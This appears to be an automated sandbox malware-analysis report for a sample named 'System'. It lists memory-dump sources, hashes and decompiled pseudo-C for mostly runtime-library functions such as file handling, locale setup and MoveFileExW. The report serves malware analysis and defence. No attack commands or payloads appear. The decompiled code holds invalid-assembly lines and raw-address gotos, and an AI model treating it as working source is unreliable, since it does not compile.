                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __std_fs_directory_iterator_open
                                                                                                                                                              • String ID: .
                                                                                                                                                              • API String ID: 4007087469-248832578
                                                                                                                                                              • Opcode ID: 3c8d310c0200c8f038934bd3f4da8abd188685457a3a122d5bf7c1a393c50205
                                                                                                                                                              • Instruction ID: 8de7d1c1b9bc0f8b973e2a60b8f9f4619e123ad05a128b0df3e45c77a0233592
                                                                                                                                                              • Opcode Fuzzy Hash: 3c8d310c0200c8f038934bd3f4da8abd188685457a3a122d5bf7c1a393c50205
                                                                                                                                                              • Instruction Fuzzy Hash: A131BF67B9864751FE109B25A6843B82361AF85FF4F044332DE2D837E5DE3EE4938209
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C641CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1330 7ff6e4c641cc-7ff6e4c641e9 1331 7ff6e4c641eb-7ff6e4c641ee 1330->1331 1332 7ff6e4c64208-7ff6e4c6421e RtlPcToFileHeader 1330->1332 1331->1332 1333 7ff6e4c641f0-7ff6e4c641fe 1331->1333 1334 7ff6e4c6422f-7ff6e4c6426b _purecall 1332->1334 1335 7ff6e4c64220-7ff6e4c64223 1332->1335 1333->1332 1336 7ff6e4c6422a 1335->1336 1337 7ff6e4c64225-7ff6e4c64228 1335->1337 1336->1334 1337->1334 1337->1336
                                                                                                                                                              APIs
                                                                                                                                                              • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF6E4C60F5E), ref: 00007FF6E4C64210
                                                                                                                                                              • _purecall.KERNELBASE(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF6E4C60F5E), ref: 00007FF6E4C64256
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileHeader_purecall
                                                                                                                                                              • String ID: csm
                                                                                                                                                              • API String ID: 3555375236-1018135373
                                                                                                                                                              • Opcode ID: 28c39f7ba3a5f01c2c8a5cb10eab44ebbf15b1926e46a057239f19a5151be9cd
                                                                                                                                                              • Instruction ID: 60cd5dba0273bac3413d784100fd491755ae8ba1847b5d93fc70f41f750c995a
                                                                                                                                                              • Opcode Fuzzy Hash: 28c39f7ba3a5f01c2c8a5cb10eab44ebbf15b1926e46a057239f19a5151be9cd
                                                                                                                                                              • Instruction Fuzzy Hash: 45113D37618B4282EB108F25F48026A77A1FB88F84F298271DE8D47768DF3DD551C709
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C69288 Relevance: 4.6, APIs: 3, Instructions: 71COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00007FF67FF6E4C69288(long long* __rax, long long __rbx, long long __rcx, long long _a8, long long _a16) {
				long long _v24;
				void* _t15;

				_a16 = __rbx;
				_a8 = __rcx;
				_v24 = _t15 - 0x30;
				if (__rcx != 0) goto 0xe4c692c2;
				E00007FF67FF6E4C6C854(__rax);
				 *__rax = 0x16;
				return E00007FF67FF6E4C6A5D8();
			}





                                                                                                                                                              0x7ff6e4c69288
                                                                                                                                                              0x7ff6e4c6928d
                                                                                                                                                              0x7ff6e4c69297
                                                                                                                                                              0x7ff6e4c692a2
                                                                                                                                                              0x7ff6e4c692a4
                                                                                                                                                              0x7ff6e4c692a9
                                                                                                                                                              0x7ff6e4c692c1

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo$_local_unwind
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1677304287-0
                                                                                                                                                              • Opcode ID: e6ad5509793aef6e96d9c7b780b1ba83e9423562360b09d98bd8d315455bd54b
                                                                                                                                                              • Instruction ID: eede2444f9917e893772ad3e824a73530a4e2b3fb582b1ec6d31577822db8c5c
                                                                                                                                                              • Opcode Fuzzy Hash: e6ad5509793aef6e96d9c7b780b1ba83e9423562360b09d98bd8d315455bd54b
                                                                                                                                                              • Instruction Fuzzy Hash: A321503BAA864741EA54DB24D4D13B83371AF95F98F449172D60E872E6DF2EE104C30B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C61144 Relevance: 4.6, APIs: 3, Instructions: 66COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 40%
                                                                                                                                                              			E00007FF67FF6E4C61144(void* __ecx, long long __rbx, long long __rsi, long long __rbp, char _a8, void* _a16, void* _a24, void* _a32) {
				void* _t26;
				signed long long _t33;
				signed long long _t34;
				long long _t37;
				intOrPtr _t43;
				signed long long _t44;
				signed long long _t49;
				void* _t57;
				signed long long _t68;

				_t33 = _t68;
				 *((long long*)(_t33 + 0x10)) = __rbx;
				 *((long long*)(_t33 + 0x18)) = __rbp;
				 *((long long*)(_t33 + 0x20)) = __rsi;
				sil = __ecx;
				E00007FF67FF6E4C60D0C(_t26, _t33 + 8);
				_t34 = _t33;
				_t43 =  *0xe4caa948; // 0x23fb1f8c700
				if (_t43 != 0) goto 0xe4c61204;
				E00007FF67FF6E4C61340(__ecx, _t34);
				_t44 = _t34;
				E00007FF67FF6E4C61370(_t34); // executed
				 *((long long*)(_t44 + 0x20)) = 0x3f;
				_t49 =  *(_t44 + 0x28);
				if (_t49 == 0xe4c91a8c) goto 0xe4c611df;
				if (_t49 == 0) goto 0xe4c611aa;
				E00007FF67FF6E4C69C88(__ecx, _t26, _t44, 0, _t57);
				 *(_t44 + 0x28) =  *(_t44 + 0x28) & 0x00000000;
				if ( *0xe4c91a8c != 0) goto 0xe4c611b2;
				0xe4c6a670();
				 *(_t44 + 0x28) = _t34;
				if (_t34 == 0) goto 0xe4c611df;
				E00007FF67FF6E4C64380();
				 *0xe4caa8f8 = _t44;
				 *0xe4c894c0();
				_t37 =  *0xe4caa8f8; // 0x23fb1f8c700
				 *0xe4caa928 = _t37;
				if (sil == 0) goto 0xe4c6121a;
				return E00007FF67FF6E4C60D84( *0xe4c894c0(),  &_a8);
			}












                                                                                                                                                              0x7ff6e4c61144
                                                                                                                                                              0x7ff6e4c61147
                                                                                                                                                              0x7ff6e4c6114b
                                                                                                                                                              0x7ff6e4c6114f
                                                                                                                                                              0x7ff6e4c61158
                                                                                                                                                              0x7ff6e4c61161
                                                                                                                                                              0x7ff6e4c61166
                                                                                                                                                              0x7ff6e4c61167
                                                                                                                                                              0x7ff6e4c61171
                                                                                                                                                              0x7ff6e4c61179
                                                                                                                                                              0x7ff6e4c6117e
                                                                                                                                                              0x7ff6e4c61184
                                                                                                                                                              0x7ff6e4c61189
                                                                                                                                                              0x7ff6e4c61190
                                                                                                                                                              0x7ff6e4c6119e
                                                                                                                                                              0x7ff6e4c611a3
                                                                                                                                                              0x7ff6e4c611a5
                                                                                                                                                              0x7ff6e4c611aa
                                                                                                                                                              0x7ff6e4c611b8
                                                                                                                                                              0x7ff6e4c611c3
                                                                                                                                                              0x7ff6e4c611c8
                                                                                                                                                              0x7ff6e4c611cf
                                                                                                                                                              0x7ff6e4c611da
                                                                                                                                                              0x7ff6e4c611df
                                                                                                                                                              0x7ff6e4c611f0
                                                                                                                                                              0x7ff6e4c611f6
                                                                                                                                                              0x7ff6e4c611fd
                                                                                                                                                              0x7ff6e4c61207
                                                                                                                                                              0x7ff6e4c6123b

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_Setgloballocalestd::locale::_
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2016263034-0
                                                                                                                                                              • Opcode ID: ab0271a85033de44697d54b638220b96b8693145da5ca2837d4927764f4e86e8
                                                                                                                                                              • Instruction ID: 0534e035aa01ee5d847c581eee81ea1644ed642afdea221093e410c323db4aaa
                                                                                                                                                              • Opcode Fuzzy Hash: ab0271a85033de44697d54b638220b96b8693145da5ca2837d4927764f4e86e8
                                                                                                                                                              • Instruction Fuzzy Hash: 9F21532BA55A4745EB149F36D89037927B0EF48F94F199172CA0E83765CE3EE445C30A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C58230 Relevance: 3.1, APIs: 2, Instructions: 75fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateFileHandle
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3498533004-0
                                                                                                                                                              • Opcode ID: 273de7c4a91e422e9c009714f1994b9ce608c1c1c5871d19326b120d003151f3
                                                                                                                                                              • Instruction ID: 704a232a953b4be70d712da66e8a6476d278e1cf3c95c6080ce08b63ce0840ce
                                                                                                                                                              • Opcode Fuzzy Hash: 273de7c4a91e422e9c009714f1994b9ce608c1c1c5871d19326b120d003151f3
                                                                                                                                                              • Instruction Fuzzy Hash: 1421E426E48B4285EA148F21B45037DB7A0EB84FA0F04423ADA5E87BC4CF3EE851C359
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C75500 Relevance: 3.1, APIs: 2, Instructions: 73COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                              			E00007FF67FF6E4C75500(void* __ecx, long long __rbx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				signed char _t52;
				signed long long _t54;
				void* _t64;
				void* _t68;
				intOrPtr _t71;
				signed long long _t74;
				signed long long _t76;
				signed long long _t83;
				void* _t95;
				void* _t98;

				_t64 = _t95;
				 *((long long*)(_t64 + 8)) = __rbx;
				 *((long long*)(_t64 + 0x10)) = __rbp;
				 *((long long*)(_t64 + 0x18)) = __rsi;
				 *((long long*)(_t64 + 0x20)) = __rdi;
				r14d = 0;
				_t76 = _t54;
				_t74 = (_t76 & 0x0000003f) + (_t76 & 0x0000003f) * 8;
				_t68 =  *((intOrPtr*)(0xe4cab700 + 0x28 + _t74 * 8)) + 2;
				if (_t68 - 1 <= 0) goto 0xe4c75553;
				 *(0xe4cab700 + 0x38 + _t74 * 8) =  *(0xe4cab700 + 0x38 + _t74 * 8) | 0x00000080;
				goto 0xe4c755e2;
				 *(0xe4cab700 + 0x38 + _t74 * 8) = 0x81;
				if (0 == 0) goto 0xe4c75574;
				if (0 == 0) goto 0xe4c7556d;
				asm("invalid");
				asm("invalid");
				_t69 = _t68 + 0xfffff6b9;
				asm("invalid");
				asm("adc eax, 0x13e41");
				_t21 = _t69 + 1; // 0x1
				if (_t21 - 1 <= 0) goto 0xe4c75597;
				_t52 = GetFileType(_t98); // executed
				goto 0xe4c75599;
				if (0 == 0) goto 0xe4c755bd;
				_t83 = _t52 & 0x000000ff;
				 *((long long*)(0xe4cab700 + 0x28 + _t74 * 8)) = _t68 + 0xfffff6b9;
				if (_t83 != 2) goto 0xe4c755b1;
				 *(0xe4cab700 + 0x38 + _t74 * 8) =  *(0xe4cab700 + 0x38 + _t74 * 8) | 0x00000040;
				goto 0xe4c755e2;
				if (_t83 != 3) goto 0xe4c755e2;
				 *(0xe4cab700 + 0x38 + _t74 * 8) =  *(0xe4cab700 + 0x38 + _t74 * 8) | 0x00000008;
				goto 0xe4c755e2;
				 *(0xe4cab700 + 0x38 + _t74 * 8) =  *(0xe4cab700 + 0x38 + _t74 * 8) | 0x00000040;
				 *((long long*)( *((intOrPtr*)(0xe4cab700 + (_t76 >> 6) * 8)) + 0x28 + _t74 * 8)) = 0xfffffffe;
				_t71 =  *0xe4cab2c8; // 0x23fb1ea6750
				if (_t71 == 0) goto 0xe4c755e2;
				 *((long long*)( *((intOrPtr*)(_t98 + _t71)) + 0x18)) = 0xfffffffe;
				if (1 != 3) goto 0xe4c7551e;
				return _t52;
			}













                                                                                                                                                              0x7ff6e4c75500
                                                                                                                                                              0x7ff6e4c75503
                                                                                                                                                              0x7ff6e4c75507
                                                                                                                                                              0x7ff6e4c7550b
                                                                                                                                                              0x7ff6e4c7550f
                                                                                                                                                              0x7ff6e4c7551b
                                                                                                                                                              0x7ff6e4c7551e
                                                                                                                                                              0x7ff6e4c75532
                                                                                                                                                              0x7ff6e4c7553f
                                                                                                                                                              0x7ff6e4c75547
                                                                                                                                                              0x7ff6e4c75549
                                                                                                                                                              0x7ff6e4c7554e
                                                                                                                                                              0x7ff6e4c75553
                                                                                                                                                              0x7ff6e4c7555c
                                                                                                                                                              0x7ff6e4c75561
                                                                                                                                                              0x7ff6e4c7556f
                                                                                                                                                              0x7ff6e4c75571
                                                                                                                                                              0x7ff6e4c75573
                                                                                                                                                              0x7ff6e4c75578
                                                                                                                                                              0x7ff6e4c7557a
                                                                                                                                                              0x7ff6e4c75582
                                                                                                                                                              0x7ff6e4c7558a
                                                                                                                                                              0x7ff6e4c7558f
                                                                                                                                                              0x7ff6e4c75595
                                                                                                                                                              0x7ff6e4c7559b
                                                                                                                                                              0x7ff6e4c7559d
                                                                                                                                                              0x7ff6e4c755a0
                                                                                                                                                              0x7ff6e4c755a8
                                                                                                                                                              0x7ff6e4c755aa
                                                                                                                                                              0x7ff6e4c755af
                                                                                                                                                              0x7ff6e4c755b4
                                                                                                                                                              0x7ff6e4c755b6
                                                                                                                                                              0x7ff6e4c755bb
                                                                                                                                                              0x7ff6e4c755bd
                                                                                                                                                              0x7ff6e4c755c2
                                                                                                                                                              0x7ff6e4c755cb
                                                                                                                                                              0x7ff6e4c755d5
                                                                                                                                                              0x7ff6e4c755db
                                                                                                                                                              0x7ff6e4c755eb
                                                                                                                                                              0x7ff6e4c7560b

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileHandleType
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3000768030-0
                                                                                                                                                              • Opcode ID: 005f6204bb13c3ce570f6acf184fd83e254a263677609f2c73dc8294747c6a2d
                                                                                                                                                              • Instruction ID: f5fd252bbf7841956eda9da0ab15d4468e701c2f162e0c9cb06b6b3708186f90
                                                                                                                                                              • Opcode Fuzzy Hash: 005f6204bb13c3ce570f6acf184fd83e254a263677609f2c73dc8294747c6a2d
                                                                                                                                                              • Instruction Fuzzy Hash: C0318527A5CA4782D7A48B3484D42782A61FB45FA0B64033BD76F877E4CF3AE451D346
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C69A50 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 28%
                                                                                                                                                              			E00007FF67FF6E4C69A50() {
				void* _t3;
				void* _t4;
				void* _t7;
				void* _t10;

				r8d = 2; // executed
				MoveFileExW(??, ??, ??); // executed
				if (_t7 != 0) goto 0xe4c69a76;
				GetLastError();
				_t3 = E00007FF67FF6E4C6C7E4(_t4, _t7, _t10);
				goto 0xe4c69a78;
				return _t3;
			}







                                                                                                                                                              0x7ff6e4c69a54
                                                                                                                                                              0x7ff6e4c69a5a
                                                                                                                                                              0x7ff6e4c69a62
                                                                                                                                                              0x7ff6e4c69a64
                                                                                                                                                              0x7ff6e4c69a6c
                                                                                                                                                              0x7ff6e4c69a74
                                                                                                                                                              0x7ff6e4c69a7c

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLastMove
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 55378915-0
                                                                                                                                                              • Opcode ID: bb53e1fbb5daa93906918b40e85fe4ba0570ea02252ba50efbd6ce9704566913
                                                                                                                                                              • Instruction ID: 47a69b4474145201da2384d0af5d2d52a86d7fbd427d319d9ebb6874830c32c4
                                                                                                                                                              • Opcode Fuzzy Hash: bb53e1fbb5daa93906918b40e85fe4ba0570ea02252ba50efbd6ce9704566913
                                                                                                                                                              • Instruction Fuzzy Hash: EED0C91EFBC51381E61427B258C637825B42F4AF21FA04776C42FC72E2EE1EA556970B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C48ED0 Relevance: 1.7, APIs: 1, Instructions: 220COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 51%
                                                                                                                                                              			E00007FF67FF6E4C48ED0(void* __ecx, void* __edx, long long __rbx, void* __rcx, long long __rdi, long long _a16, long long _a24) {
				void* _v8;
				signed int _v16;
				long long _v24;
				long long _v32;
				signed char _v48;
				char _v55;
				char _v56;
				char _v64;
				char _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				long long _v104;
				signed char _t87;
				void* _t91;
				long long _t98;
				intOrPtr _t107;
				signed long long _t121;
				long long _t124;
				intOrPtr* _t129;
				void* _t133;
				intOrPtr _t134;
				void* _t138;
				void* _t140;
				void* _t152;
				void* _t153;
				intOrPtr _t158;
				signed long long _t159;
				long long _t160;
				long long _t162;
				void* _t170;
				long long* _t179;
				intOrPtr _t188;
				void* _t192;
				void* _t195;
				long long* _t198;
				void* _t200;
				long long _t201;
				void* _t205;
				void* _t211;
				void* _t212;

				_a16 = __rbx;
				_a24 = __rdi;
				_t121 =  *0xe4ca90a0; // 0x1ae1b17e2973
				_v16 = _t121 ^ _t195 - 0x00000080;
				_t192 = __rcx;
				_t158 =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x38))));
				if (_t158 == 0) goto 0xe4c48f2e;
				_t179 =  *((intOrPtr*)(__rcx + 0x50));
				_t198 =  *_t179;
				_t124 = _t158 + _t198;
				if (_t158 - _t124 >= 0) goto 0xe4c48f2e;
				 *_t179 = _t124;
				_t159 =  *((intOrPtr*)(__rcx + 0x38));
				 *_t159 =  *_t159 + 1;
				goto 0xe4c49152;
				_t98 =  *((long long*)(__rcx + 0x80));
				if (_t98 != 0) goto 0xe4c48f42;
				 *((intOrPtr*)(__rbx + 0x47 + _t159 * 4)) =  *((intOrPtr*)(__rbx + 0x47 + _t159 * 4)) + __ecx;
				asm("sbb [eax-0x73], cl");
				if (_t98 < 0) goto 0xe4c48f94;
				if ( *0xffffffff != 0xffffffff) goto 0xe4c48f6f;
				_t160 =  *((intOrPtr*)(__rcx + 0x88));
				 *_t198 = _t160;
				 *((long long*)( *((intOrPtr*)(__rcx + 0x38)))) = _t160;
				_t129 =  *((intOrPtr*)(__rcx + 0x50));
				 *_t129 =  *((intOrPtr*)(__rcx + 0x90)) - _t160;
				if ( *((long long*)(__rcx + 0x68)) != 0) goto 0xe4c48f98; // executed
				_t87 = E00007FF67FF6E4C69288(_t129, __rbx,  *((intOrPtr*)(__rcx + 0x80))); // executed
				 *_t129 =  *_t129 + _t87;
				goto 0xe4c49150;
				_v48 = 0;
				_v32 = 0;
				_v24 = 0xf;
				_v48 = _t87;
				r8d = E00007FF67FF6E4C69288(0, _t87 & 0x000000ff,  *((intOrPtr*)(__rcx + 0x80)));
				if (0 == 0xffffffff) goto 0xe4c49114;
				_t162 = _v32;
				if (_t162 - _v24 >= 0) goto 0xe4c48feb;
				_v32 = _t162 + 1;
				_t133 =  >=  ? _v48 :  &_v48;
				 *(_t133 + _t162) = r8b;
				 *((char*)(_t133 + _t162 + 1)) = 0;
				goto 0xe4c48fff;
				r9d = r8b & 0xffffffff;
				r8d = 0;
				E00007FF67FF6E4C4C910( &_v48, _v24, __rcx, _t211, _t212);
				_t185 =  >=  ? _v48 :  &_v48;
				_t205 = _v32 + ( >=  ? _v48 :  &_v48);
				_t200 =  >=  ? _v48 :  &_v48;
				_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x68))));
				_v80 =  &_v64;
				_v88 =  &_v55;
				_v96 =  &_v56;
				_v104 =  &_v72;
				 *((intOrPtr*)(_t134 + 0x30))();
				_t107 = _t134;
				if (_t107 == 0) goto 0xe4c49060;
				if (_t107 != 0) goto 0xe4c490b7;
				if (_v64 !=  &_v56) goto 0xe4c490cf;
				_t138 =  >=  ? _v48 :  &_v48;
				_t201 = _v32;
				_t208 =  <  ? _t201 : _v72 - _t138;
				_t170 =  >=  ? _v48 :  &_v48;
				_t202 = _t201 - ( <  ? _t201 : _v72 - _t138);
				_v32 = _t201 - ( <  ? _t201 : _v72 - _t138);
				E00007FF67FF6E4C64380();
				goto 0xe4c48fad;
				if (_t138 != 2) goto 0xe4c49114;
				_t140 =  >=  ? _v48 :  &_v48;
				goto 0xe4c49119;
				_t141 =  >=  ? _v48 : _t140;
				_t152 = _v32 - _v72 + ( >=  ? _v48 : _t140);
				if (_t152 <= 0) goto 0xe4c4910e;
				_t153 = _t152 - 1;
				_t188 =  *((intOrPtr*)(_t192 + 0x80));
				_t91 = E00007FF67FF6E4C69DC4(__ecx,  >=  ? _v48 : _t140, _t153, _t188);
				if (_t153 <= 0) goto 0xe4c4910e;
				goto 0xe4c490f0;
				goto 0xe4c49119;
				if (_t188 - 0x10 < 0) goto 0xe4c49150;
				if (_t188 + 1 - 0x1000 < 0) goto 0xe4c4914b;
				if (_v48 -  *((intOrPtr*)(_v48 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c49173;
				0xe4c623d0();
				return E00007FF67FF6E4C623B0(_t91, __ecx, _v16 ^ _t195 - 0x00000080);
			}












































                                                                                                                                                              0x7ff6e4c48ed0
                                                                                                                                                              0x7ff6e4c48ed5
                                                                                                                                                              0x7ff6e4c48ee5
                                                                                                                                                              0x7ff6e4c48eef
                                                                                                                                                              0x7ff6e4c48ef3
                                                                                                                                                              0x7ff6e4c48efa
                                                                                                                                                              0x7ff6e4c48f00
                                                                                                                                                              0x7ff6e4c48f02
                                                                                                                                                              0x7ff6e4c48f06
                                                                                                                                                              0x7ff6e4c48f09
                                                                                                                                                              0x7ff6e4c48f10
                                                                                                                                                              0x7ff6e4c48f16
                                                                                                                                                              0x7ff6e4c48f18
                                                                                                                                                              0x7ff6e4c48f23
                                                                                                                                                              0x7ff6e4c48f29
                                                                                                                                                              0x7ff6e4c48f2e
                                                                                                                                                              0x7ff6e4c48f36
                                                                                                                                                              0x7ff6e4c48f41
                                                                                                                                                              0x7ff6e4c48f45
                                                                                                                                                              0x7ff6e4c48f48
                                                                                                                                                              0x7ff6e4c48f4d
                                                                                                                                                              0x7ff6e4c48f56
                                                                                                                                                              0x7ff6e4c48f5d
                                                                                                                                                              0x7ff6e4c48f64
                                                                                                                                                              0x7ff6e4c48f69
                                                                                                                                                              0x7ff6e4c48f6d
                                                                                                                                                              0x7ff6e4c48f7b
                                                                                                                                                              0x7ff6e4c48f7d
                                                                                                                                                              0x7ff6e4c48f8e
                                                                                                                                                              0x7ff6e4c48f93
                                                                                                                                                              0x7ff6e4c48f9a
                                                                                                                                                              0x7ff6e4c48f9e
                                                                                                                                                              0x7ff6e4c48fa2
                                                                                                                                                              0x7ff6e4c48faa
                                                                                                                                                              0x7ff6e4c48fb5
                                                                                                                                                              0x7ff6e4c48fb8
                                                                                                                                                              0x7ff6e4c48fbe
                                                                                                                                                              0x7ff6e4c48fc9
                                                                                                                                                              0x7ff6e4c48fcf
                                                                                                                                                              0x7ff6e4c48fdb
                                                                                                                                                              0x7ff6e4c48fe0
                                                                                                                                                              0x7ff6e4c48fe4
                                                                                                                                                              0x7ff6e4c48fe9
                                                                                                                                                              0x7ff6e4c48feb
